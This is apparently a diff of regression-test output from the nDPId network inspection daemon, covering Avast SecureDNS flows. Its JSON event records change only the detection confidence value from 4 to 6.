+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625241714787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241714787,"pkt":"YDjgxTWgeJS0JASgCABFAADMRgkAADERpqC11iOVwKgCZAG79TcAuPC0RwSBgAABAAEAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":860,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1625320207133} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625320207133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625320207133,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9IAAH8RU2DAqAJktdYjld0FAbsALycJUJMBAAABAAAAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625320207252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625320207252,"pkt":"YDjgxTWgeJS0JASgCABFAADMnAoAADMRTp+11iOVwKgCZAG73QUAuJ93UJOBgAABAAEAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625320209063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625320209063,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9YAAH8RU1zAqAJktdYjld29AbsAL+vXy0wBAAABAAAAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625320209184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625320209184,"pkt":"YDjgxTWgeJS0JASgCABFAADMnWsAADMRTT611iOVwKgCZAG73b0AuGRGy0yBgAABAAEAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1625321673727} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625321673727,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625321673727,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9wAAH8RU1bAqAJktdYjlcWVAbsAL1g+dw4BAAABAAAAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625321673848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625321673848,"pkt":"YDjgxTWgeJS0JASgCABFAADMus8AADIRMNq11iOVwKgCZAG7xZUAuNCsdw6BgAABAAEAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625321675283,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625321675283,"pkt":"eJS0JASgYDjgxTWgCABFAABDS98AAH8RU1PAqAJktdYjle6zAbsAL9OvEl8BAAABAAAAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625321675403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625321675403,"pkt":"YDjgxTWgeJS0JASgCABFAADMuxcAADMRL5K11iOVwKgCZAG77rMAuEweEl+BgAABAAEAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1720,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1625395217252} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625395217252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625395217252,"pkt":"eJS0JASgYDjgxTWgCABFAABDKckAAH8RdWnAqAJktdYjlf26AbsAL3dTP5QBAAABAAAAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMg3oAADIRaC+11iOVwKgCZAG7\/boAuO\/BP5SBgAABAAEAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625395217373,"pkt":"eJS0JASgYDjgxTWgCABFAABDKcUAAH8RdW3AqAJktdYjlejlAbsAL0m4oeQBAAABAAAAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAAB"} 